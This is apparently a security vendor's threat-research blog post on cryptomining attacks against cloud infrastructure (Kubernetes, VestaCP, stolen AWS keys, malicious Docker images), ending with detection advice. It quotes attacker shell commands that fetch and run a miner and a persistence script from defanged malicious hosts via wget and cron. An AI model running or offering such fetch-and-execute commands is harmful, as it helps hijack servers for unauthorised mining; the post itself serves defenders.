By Chris Doman and Tom Hegel
Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of.
One of the most widely observed objectives of attacking an organization's cloud infrastructure has been for cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers’ end objective is to use your cloud infrastructure to mine cryptocurrency.
Compromised Container Management Platforms
We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms.
We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request.
RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification.
Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves.
Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns.
Control Panel Exploitation
We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code.
In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP. This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP. VestaCP users provided details on how their installations were compromised.
In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency.
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa[.]eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
Lastly, the attackers set the following script to run in Cron, ensuring mining persistence after quick attempts at removal.
wget -O /tmp/load.sh http://bigbatman[.]loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa[.]eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
While not directly related to mining, it’s noteworthy to mention VestaCP has had a number of other security issues. One of particular severity was a compromise of the official source-code which resulted in the administrative username and passwords of new installations being sent to attackers. This resulted in the malicious deployment and use of Linux/ChachaDDoS malware.
API Key Compromise
Perhaps the best known method of compromising cloud computing is through the theft of API keys. There are many attackers who automatically scan the web and various public tools such as GitHub for API keys which are unknowingly publicly accessible.
As some have experienced, the attackers work fast and can greatly impact business operations. A post from a Reddit user claiming AWS key was compromised to mine Monero, detailing how their AWS account was hacked in January 2018 to mine Monero.
Malicious Docker Images
Another avenue of attack is to run malicious Docker containers. This approach generally relies on individuals across the world who use prebuilt Docker images and in an effort to save time, download images with containers operating a mining service.
This mining service is unknown to the user and will continue generating income for the malicious owner. There have been reports of Docker images known to be abused in Monero mining schemes on Dockerhub, the official container repository.
There have been a relatively small number of users who have reported running these malicious containers. However, some may still be found on Reddit on compromise by Luoxk.
Detecting Cryptocurrency Mining Attacks
Below, we’ve outlined some recommendations for detecting mining attacks in the cloud. The screenshots are from our USM Anywhere platform, however a similar approach should be possible in other threat detection and response tools.
You can detect the Stratum mining protocol over the network.
Figure 7. A network detection for crypto-mining
You can also detect crypto mining generically on hosts by looking for command line parameters that resemble those of common crypto-mining tools such as xmrig.
Figure 8. A host detection for crypto-mining
For server-side attacks that lead to instances compromised for mining, we normally see exploits executed over the network.
Figure 9. A host detection for an exploited Tomcat instance
Most of these network exploits then run shell scripts to persist via cron jobs and run crypto-mining from the /tmp folder. You can look for both of these suspicious behaviours.
Figure 10. A generic detection for crypto-mining on a host
You can also use Yara rules to identify crypto mining software.
Figure 11. A detection for mining software detected on a host
You can also generically look for Docker containers spinning up with suspicious commands containing keywords associated with crypto-mining.
Figure 12. A generic detection for a crypto-mining Docker container
The malicious activity is often specific to cloud environments. For example, when an attacker steals a credential for AWS, they will normally start deleting instances and spinning up new instances to mine cryptocurrency.
This generates a large number of suspicious events.
Figure 13. AWS IAM Role Access Failure Alarm.
Figure 14. AWS EC2 Security Group Modification Alarm.
Figure 15. AWS Instance Terminated Alarm.
Figure 16. CloudTrail Trail Deleted Alarm
Figure 17. ACL Exposing Amazon S3 Object or Bucket Added Alarm
Figure 18. AWS Root Account Login Alarm.
We now map these detections out by the MITRE ATT&CK™ framework, so you can quickly see the progress of an attacker.
Figure 19. Detections mapped by the MITRE ATT&CK™ framework
Indicators of Compromise
You can view additional indicators in our OTX Pulse.